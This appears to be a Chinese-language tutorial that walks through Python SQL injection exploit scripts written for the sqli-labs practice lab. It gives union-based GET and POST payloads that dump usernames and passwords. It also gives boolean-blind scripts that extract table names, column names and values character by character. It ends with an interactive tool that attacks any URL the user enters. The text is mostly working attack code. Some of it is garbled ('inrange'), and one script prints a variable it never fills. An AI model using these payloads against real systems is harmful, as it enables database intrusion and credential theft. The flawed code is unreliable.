import requests import re url='http://sql.com/Less-1/' payload="?id=-1' union select 1,group_concat('~',username,',',password,'~'),3 from users --+" all = str(url) + str(payload) res = requests.get(all) text=res.text result=re.findall('~(.*?)~',text) print(result)
引入re和requests的库,然后初始化好我们的payload
这里把url和payload拼接好,先转化成str型
然后得到响应以后的网页的源代码
然后利用正则匹配去匹配我们的数据
POST类型的SQL注入exp编写
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
import requests import re payload="1' union select 1,group_concat('~',username,',',password,'~') from users #" response=requests.post( url='http://sql.com/Less-11/', headers={ 'Conternt-Type':'application/x-www-form-urlencoded;charset=UTF-8' }, data={ 'uname':payload, 'passwd':1, 'submit':'Submit' } ) text=response.text print(re.findall('~(.*?)~',text))
import requests import re url='http://sql.com/Less-8/' for x inrange(0,5): table = '' for i inrange(1,30): for j inrange(31,128): #payload="?id=1' and (select length(database()) ="+str(i)+")--+" payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+" all=str(url)+str(payload) res = requests.get(all) text = res.text content='You are in' result=(text.find(content)) if (result!=-1): table=table+chr(j) print("第"+str(x+1)+"个表的表名是:"+table) print('结束')
接下来是爆列名的exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
import requests import re url='http://sql.com/Less-8/' for x inrange(0,10): column = '' for i inrange(1,30): for j inrange(31,128): #payload="?id=1' and (select length(database()) ="+str(i)+")--+" #payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+" payload="?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+" all=str(url)+str(payload) res = requests.get(all) text = res.text content='You are in' result=(text.find(content)) if (result!=-1): column=column+chr(j) print("第"+str(x+1)+"个列的列名是:"+column) print('结束')
import requests import re url='http://sql.com/Less-8/' for x inrange(0,10): value = '' for i inrange(1,30): for j inrange(31,128): #payload="?id=1' and (select length(database()) ="+str(i)+")--+" #payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+" #payload="?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+" payload = "?id=1' and (select ascii(substr((select username from users limit " + str(x) + ",1) ," + str(i) + ",1)) = " + str(j) + ") --+" all=str(url)+str(payload) res = requests.get(all) text = res.text content='You are in' result=(text.find(content)) if (result!=-1): column=column+chr(j) print("第"+str(x+1)+"个值是:"+value) print('结束')
import requests url=input("输入需要注入的URL:") print("1.爆当前数据库的数据表名") print("2.爆指定数据表的列名") print("3.爆出数据库里的数据") print("输入你要使用的功能(输入数字1,2或者3):") select=input("请输入你选择的功能:") if (select=='1'): for i inrange(0,5):#数据表个数 table='' for j inrange(0,30):#数据表长度 for k inrange(31,128): #数据表单个字符的ascii值 payload = "?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1) ," + str(j) + ",1)) = " + str(k) + ") --+" all = str(url) + str(payload) res = requests.get(all) text = res.text content = 'You are in' result = (text.find(content)) if (result != -1): table = table + chr(k) print("第" + str(i + 1) + "个表的表名是:" + table) if (select=='2'): for a inrange(0,5):#列的个数 column = '' for b inrange(0, 30): # 列长度 for c inrange(31, 128): # 数据表单个字符的ascii值 payload = "?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(a)+",1) ,"+str(b)+",1)) = "+str(c)+") --+" all = str(url) + str(payload) res = requests.get(all) text = res.text content = 'You are in' result = (text.find(content)) if (result != -1): column=column+chr(c) print("第" + str(a + 1) + "个列名是:" + column) if (select=='3'): zd=input("要爆哪一列的数据:") biao=input("要爆哪一个表的数据:") for d inrange(0,5):#值的个数 value = '' for e inrange(0, 30): # 列长度 for f inrange(31, 128): # 数据表单个字符的ascii值 payload = "?id=1' and (select ascii(substr((select "+zd+" from "+biao+" limit " + str(d) + ",1) ," + str(e) + ",1)) = " + str(f) + ") --+" all = str(url) + str(payload) res = requests.get(all) text = res.text content = 'You are in' result = (text.find(content)) if (result != -1): value = value + chr(f) print("第" + str(d + 1) + "个值是:" + value)